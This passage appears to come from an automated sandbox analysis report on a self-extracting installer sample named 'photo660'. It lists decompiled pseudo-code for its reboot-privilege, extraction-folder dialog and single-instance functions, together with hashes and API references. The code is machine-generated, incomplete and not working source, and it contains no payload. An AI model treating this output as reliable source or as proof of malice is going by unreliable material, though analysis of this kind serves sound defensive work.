                                                                                                                                                                                                        • Opcode ID: 1417746d9db4b157104e75cd264fb751214e265040f9ff124a2f7339dbc8d653
                                                                                                                                                                                                        • Instruction ID: d8a19202114e940e5a3796085943a015b69b015c2914bb09165f93852d82fda0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1417746d9db4b157104e75cd264fb751214e265040f9ff124a2f7339dbc8d653
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCD13B71D34A66DEDB358E389C4C7FA37E5ABB6300F1440EAC486C6590DAB44EE68F40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00211F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00211F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x219a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x218004; // 0x58ac7c6d
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E002144B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00216CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E002144B9(0, 0x522, 0x211140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00211EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                        0x00211f90
                                                                                                                                                                                                        0x00211f90
                                                                                                                                                                                                        0x00211f93
                                                                                                                                                                                                        0x00211f98
                                                                                                                                                                                                        0x00211fa4
                                                                                                                                                                                                        0x00211fa7
                                                                                                                                                                                                        0x00211fc5
                                                                                                                                                                                                        0x00211fcd
                                                                                                                                                                                                        0x00211fdb
                                                                                                                                                                                                        0x00211ee5
                                                                                                                                                                                                        0x00211eea
                                                                                                                                                                                                        0x00211ef1
                                                                                                                                                                                                        0x00211ef4
                                                                                                                                                                                                        0x00211f0c
                                                                                                                                                                                                        0x00211f2e
                                                                                                                                                                                                        0x00211f3a
                                                                                                                                                                                                        0x00211f46
                                                                                                                                                                                                        0x00211f4d
                                                                                                                                                                                                        0x00211f58
                                                                                                                                                                                                        0x00211f60
                                                                                                                                                                                                        0x00211f61
                                                                                                                                                                                                        0x00211f62
                                                                                                                                                                                                        0x00211f75
                                                                                                                                                                                                        0x00211f80
                                                                                                                                                                                                        0x00211f77
                                                                                                                                                                                                        0x00211f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211f77
                                                                                                                                                                                                        0x00211f64
                                                                                                                                                                                                        0x00211f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211f64
                                                                                                                                                                                                        0x00211f0e
                                                                                                                                                                                                        0x00211f0e
                                                                                                                                                                                                        0x00211f13
                                                                                                                                                                                                        0x00211f13
                                                                                                                                                                                                        0x00211f14
                                                                                                                                                                                                        0x00211f14
                                                                                                                                                                                                        0x00211f16
                                                                                                                                                                                                        0x00211f17
                                                                                                                                                                                                        0x00211f1a
                                                                                                                                                                                                        0x00211f1f
                                                                                                                                                                                                        0x00211f1f
                                                                                                                                                                                                        0x00211f86
                                                                                                                                                                                                        0x00211f8f
                                                                                                                                                                                                        0x00211fcf
                                                                                                                                                                                                        0x00211fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211fd3
                                                                                                                                                                                                        0x00211fa9
                                                                                                                                                                                                        0x00211fb4
                                                                                                                                                                                                        0x00211fbb
                                                                                                                                                                                                        0x00211fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211fc3
                                                                                                                                                                                                        0x00211f9a
                                                                                                                                                                                                        0x00211f9a
                                                                                                                                                                                                        0x00211fa2
                                                                                                                                                                                                        0x00211fd9
                                                                                                                                                                                                        0x00211fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00211EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00211F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00211FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: b8f58bf0aaaaa6622b8225d2492cb0da22db5842ad325b077e9d3a530244b6ac
                                                                                                                                                                                                        • Instruction ID: 798d2ef4b98aeafb02a6c615d4ea17a268664f9c999e18d84a91f2cbbf5ef641
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f58bf0aaaaa6622b8225d2492cb0da22db5842ad325b077e9d3a530244b6ac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03210771A513057BDB205FA1AC4EFFF76F8EBA5B10F204019FB06D2481DB7588B29661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x216e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                        0x00216cf7
                                                                                                                                                                                                        0x00216cfd
                                                                                                                                                                                                        0x00216d00
                                                                                                                                                                                                        0x00216d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00216E26,00211000), ref: 00216CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(&n!,?,00216E26,00211000), ref: 00216D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00216E26,00211000), ref: 00216D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00216E26,00211000), ref: 00216D12
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID: &n!
                                                                                                                                                                                                        • API String ID: 3231755760-1956033847
                                                                                                                                                                                                        • Opcode ID: 664609a9e3168517d86e5639c9beca9255607974be0bd9fb71f21a101c979295
                                                                                                                                                                                                        • Instruction ID: 5c555e01a2b8920a67299c63a03e9c45f4d111ca938483cddbf2fb4c55b3450d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 664609a9e3168517d86e5639c9beca9255607974be0bd9fb71f21a101c979295
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BED0C932001108BBDB012BE1FC0CA993F28FB58222F448010F71D82020CE3244518B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00213210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E002143D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "photo660");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x219a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x2191e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E002144B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x2191e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x2191e5 - 3;
						if(_t49 - 0x2191e5 < 3) {
							goto L32;
						}
						_t24 =  *0x2191e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x2191e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0021658A(0x2191e4, 0x104, 0x211140);
								_t27 = E002158C8(0x2191e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x2191e4 - 0x5c;
									if( *0x2191e4 != 0x5c) {
										L30:
										_t30 = E0021597D(0x2191e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x2191e5 - 0x5c;
									if( *0x2191e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E002144B9(_t64, 0x54a, 0x2191e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x2191e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x2191e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x2191e4 - 0x5c;
						if( *0x2191e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x219124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x219a3c, 0x3e8, 0x218598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00214224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x2187a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E002144B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                        0x0021321b
                                                                                                                                                                                                        0x0021321e
                                                                                                                                                                                                        0x00213221
                                                                                                                                                                                                        0x0021343c
                                                                                                                                                                                                        0x0021343e
                                                                                                                                                                                                        0x0021343f
                                                                                                                                                                                                        0x00213445
                                                                                                                                                                                                        0x00213447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213447
                                                                                                                                                                                                        0x00213229
                                                                                                                                                                                                        0x0021322a
                                                                                                                                                                                                        0x0021322f
                                                                                                                                                                                                        0x002133ec
                                                                                                                                                                                                        0x002133f7
                                                                                                                                                                                                        0x00213410
                                                                                                                                                                                                        0x00213416
                                                                                                                                                                                                        0x0021341d
                                                                                                                                                                                                        0x0021342d
                                                                                                                                                                                                        0x0021342d
                                                                                                                                                                                                        0x00213438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213438
                                                                                                                                                                                                        0x00213237
                                                                                                                                                                                                        0x00213243
                                                                                                                                                                                                        0x00213243
                                                                                                                                                                                                        0x00213246
                                                                                                                                                                                                        0x002132ee
                                                                                                                                                                                                        0x002132f4
                                                                                                                                                                                                        0x002132f6
                                                                                                                                                                                                        0x002133d4
                                                                                                                                                                                                        0x002133d6
                                                                                                                                                                                                        0x002133db
                                                                                                                                                                                                        0x002133dc
                                                                                                                                                                                                        0x002133de
                                                                                                                                                                                                        0x002133df
                                                                                                                                                                                                        0x00213370
                                                                                                                                                                                                        0x00213372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213372
                                                                                                                                                                                                        0x002132fc
                                                                                                                                                                                                        0x00213301
                                                                                                                                                                                                        0x00213301
                                                                                                                                                                                                        0x00213303
                                                                                                                                                                                                        0x00213304
                                                                                                                                                                                                        0x00213304
                                                                                                                                                                                                        0x0021330a
                                                                                                                                                                                                        0x0021330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213313
                                                                                                                                                                                                        0x00213318
                                                                                                                                                                                                        0x0021331a
                                                                                                                                                                                                        0x00213331
                                                                                                                                                                                                        0x00213332
                                                                                                                                                                                                        0x0021333a
                                                                                                                                                                                                        0x0021333d
                                                                                                                                                                                                        0x0021337c
                                                                                                                                                                                                        0x00213388
                                                                                                                                                                                                        0x0021338f
                                                                                                                                                                                                        0x00213394
                                                                                                                                                                                                        0x00213396
                                                                                                                                                                                                        0x002133a4
                                                                                                                                                                                                        0x002133ab
                                                                                                                                                                                                        0x002133b6
                                                                                                                                                                                                        0x002133be
                                                                                                                                                                                                        0x002133c3
                                                                                                                                                                                                        0x002133c5
                                                                                                                                                                                                        0x00213435
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x002133c7
                                                                                                                                                                                                        0x002133c9
                                                                                                                                                                                                        0x002133cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002133cc
                                                                                                                                                                                                        0x002133ad
                                                                                                                                                                                                        0x002133b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002133b4
                                                                                                                                                                                                        0x00213398
                                                                                                                                                                                                        0x00213399
                                                                                                                                                                                                        0x0021339b
                                                                                                                                                                                                        0x0021339c
                                                                                                                                                                                                        0x0021339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021339d
                                                                                                                                                                                                        0x0021334c
                                                                                                                                                                                                        0x00213351
                                                                                                                                                                                                        0x00213354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021335c
                                                                                                                                                                                                        0x00213362
                                                                                                                                                                                                        0x00213364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213366
                                                                                                                                                                                                        0x00213367
                                                                                                                                                                                                        0x00213369
                                                                                                                                                                                                        0x0021336a
                                                                                                                                                                                                        0x0021336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021336b
                                                                                                                                                                                                        0x0021331c
                                                                                                                                                                                                        0x00213323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213329
                                                                                                                                                                                                        0x0021332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021332b
                                                                                                                                                                                                        0x0021324c
                                                                                                                                                                                                        0x0021324c
                                                                                                                                                                                                        0x0021324f
                                                                                                                                                                                                        0x002132c8
                                                                                                                                                                                                        0x002132ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132ce
                                                                                                                                                                                                        0x00213251
                                                                                                                                                                                                        0x00213256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213271
                                                                                                                                                                                                        0x00213277
                                                                                                                                                                                                        0x00213279
                                                                                                                                                                                                        0x00213298
                                                                                                                                                                                                        0x0021329d
                                                                                                                                                                                                        0x0021329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132b0
                                                                                                                                                                                                        0x002132b6
                                                                                                                                                                                                        0x002132b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132be
                                                                                                                                                                                                        0x00213280
                                                                                                                                                                                                        0x00213289
                                                                                                                                                                                                        0x0021328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021328e
                                                                                                                                                                                                        0x0021327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00218598,00000200), ref: 00213271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002133E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 002133F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00213410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00213426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0021342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 0021343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-1202457652
                                                                                                                                                                                                        • Opcode ID: e5eadd88981e83d59fc7df70aa8244688b7385931f02c7d1184cd778eb77d62c
                                                                                                                                                                                                        • Instruction ID: 2547b4691fad86b2af7e9e0d0e8d6946706c0a4a2d7377fab6935b19c9acfa31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5eadd88981e83d59fc7df70aa8244688b7385931f02c7d1184cd778eb77d62c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C512A303B1251B6E7229F356C4CFFB2DDE9B76B50F108024F509960C0CEB48AE192A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00212CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x218004; // 0x58ac7c6d
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x219a3c = __ecx;
				memset(0x219140, 0, 0x8fc);
				memset(0x218a20, 0, 0x32c);
				memset(0x2188c0, 0, 0x104);
				 *0x2193ec = 1;
				_t20 = E0021468F("TITLE", 0x219154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x21858c = _t27;
					SetEvent(_t27);
					_t64 = 0x219a34;
					if(E0021468F("EXTRACTOPT", 0x219a34, 4) != 0) {
						if(( *0x219a34 & 0x000000c0) == 0) {
							L12:
							 *0x219120 =  *0x219120 & _t65;
							if(E00215C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x218a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x218184 != 0) {
										__imp__#17();
									}
									if( *0x218a24 == 0) {
										_t57 = _t65;
										if(E002136EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x219a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x219a34 & 0x00000100) == 0 || ( *0x218a38 & 0x00000001) != 0 || E002118A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00216517(_t57, 0x7d6, _t34, E002119E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00212390(0x218a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E002144B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0021468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x218588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x219a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E002144B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E002144B9(0, 0x54b, "photo660", 0, 0x10, 0);
										L11:
										CloseHandle( *0x218588);
										 *0x219124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x219124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00216CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                        0x00212cb5
                                                                                                                                                                                                        0x00212cbc
                                                                                                                                                                                                        0x00212cc7
                                                                                                                                                                                                        0x00212cc9
                                                                                                                                                                                                        0x00212cd1
                                                                                                                                                                                                        0x00212cd3
                                                                                                                                                                                                        0x00212cd9
                                                                                                                                                                                                        0x00212ce9
                                                                                                                                                                                                        0x00212cf9
                                                                                                                                                                                                        0x00212d0e
                                                                                                                                                                                                        0x00212d15
                                                                                                                                                                                                        0x00212d1c
                                                                                                                                                                                                        0x00212ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212d2d
                                                                                                                                                                                                        0x00212d34
                                                                                                                                                                                                        0x00212d3b
                                                                                                                                                                                                        0x00212d40
                                                                                                                                                                                                        0x00212d48
                                                                                                                                                                                                        0x00212d59
                                                                                                                                                                                                        0x00212d84
                                                                                                                                                                                                        0x00212e1f
                                                                                                                                                                                                        0x00212e1f
                                                                                                                                                                                                        0x00212e2e
                                                                                                                                                                                                        0x00212e41
                                                                                                                                                                                                        0x00212e5a
                                                                                                                                                                                                        0x00212e62
                                                                                                                                                                                                        0x00212e6c
                                                                                                                                                                                                        0x00212e6c
                                                                                                                                                                                                        0x00212e75
                                                                                                                                                                                                        0x00212e77
                                                                                                                                                                                                        0x00212e77
                                                                                                                                                                                                        0x00212e84
                                                                                                                                                                                                        0x00212e8b
                                                                                                                                                                                                        0x00212e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212e96
                                                                                                                                                                                                        0x00212e96
                                                                                                                                                                                                        0x00212e9e
                                                                                                                                                                                                        0x00212ea2
                                                                                                                                                                                                        0x00212eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212ece
                                                                                                                                                                                                        0x00212ede
                                                                                                                                                                                                        0x00212eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212eed
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212ea2
                                                                                                                                                                                                        0x00212e86
                                                                                                                                                                                                        0x00212e88
                                                                                                                                                                                                        0x00212e88
                                                                                                                                                                                                        0x00212e43
                                                                                                                                                                                                        0x00212e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212e48
                                                                                                                                                                                                        0x00212e30
                                                                                                                                                                                                        0x00212e30
                                                                                                                                                                                                        0x00212ef8
                                                                                                                                                                                                        0x00212f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f01
                                                                                                                                                                                                        0x00212d8a
                                                                                                                                                                                                        0x00212d8f
                                                                                                                                                                                                        0x00212da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212da3
                                                                                                                                                                                                        0x00212dae
                                                                                                                                                                                                        0x00212db4
                                                                                                                                                                                                        0x00212dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212dca
                                                                                                                                                                                                        0x00212dd3
                                                                                                                                                                                                        0x00212df5
                                                                                                                                                                                                        0x00212e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
